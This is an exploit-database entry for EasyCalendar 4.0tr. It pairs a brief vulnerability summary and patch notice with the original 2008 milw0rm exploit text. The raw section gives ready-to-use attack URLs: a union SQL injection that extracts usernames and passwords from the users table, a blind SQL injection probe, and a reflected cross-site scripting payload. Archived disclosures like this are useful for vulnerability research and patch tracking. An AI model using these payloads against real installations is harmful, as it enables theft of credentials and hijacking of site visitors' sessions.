header-logo
Suggest Exploit
vendor:
EasyCalendar
by:
JosS
7.5
CVSS
HIGH
Multiple Remote Vulnerabilities
89, 89, 79
CWE
Product Name: EasyCalendar
Affected Version From: 4.0tr
Affected Version To: 4.0tr
Patch Exists: Yes
Related CWE: N/A
CPE: a:myiosoft:easycalendar
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: localhost
2008

EasyCalendar <= 4.0tr - Multiple Remote Vulnerabilities

EasyCalendar is vulnerable to multiple remote vulnerabilities including SQL Injection, Blind SQL Injection and Cross Site Scripting. The SQL Injection vulnerability exists in the calendar_backend.php file and can be exploited by sending a maliciously crafted HTTP request to the vulnerable server. The Blind SQL Injection vulnerability exists in the ajaxp_backend.php file and can be exploited by sending a maliciously crafted HTTP request to the vulnerable server. The Cross Site Scripting vulnerability exists in the calendar_backend.php file and can be exploited by sending a maliciously crafted HTTP request to the vulnerable server.

Mitigation:

The vendor has released a patch to address these vulnerabilities. Users should upgrade to the latest version of EasyCalendar.
Source

Exploit-DB raw data:

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+               EasyCalendar <= 4.0tr - Multiple Remote Vulnerabilities              +==--
--==+====================================================================================+==--
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: EsayCalendar
[~] HomePage: http://myiosoft.com
[~] Exploit: Multiple Remote Vulnerabilities [High]
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Verified in localhost with EsayCalendar 4.0tr and magic_quotes Off

[+] Remote SQL Injection:

[~] Vuln File: calendar_backend.php
[~] Exploit: http://localhost/PATH/plugins/calendar/calendar_backend.php?pageec=dayview&month=2&year=-1[SQL]
[~] Example: -1+union+all+select+1,2,3,concat(username,char(54),password),5,6,7,8,9,0,1+from+dbpfixajaxp_users/*

[+] Blind SQL Injection:

[~] Vuln File: ajaxp_backend.php
[~] Exploit: http://localhost/PATH/ajaxp_backend.php?page=[BLIND]
[~] Example: 1+and+1%3D0 

[+] Cross Site Scripting:

[~] Vuln File: calendar_backend.php
[~] Exploit: http://localhost/PATH/plugins/calendar/calendar_backend.php?pageec=dayview&day=[XSS]
[~] Example: >'><ScRiPt%20%0a%0d>alert("JosS")%3B</ScRiPt>


--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2008-03-12]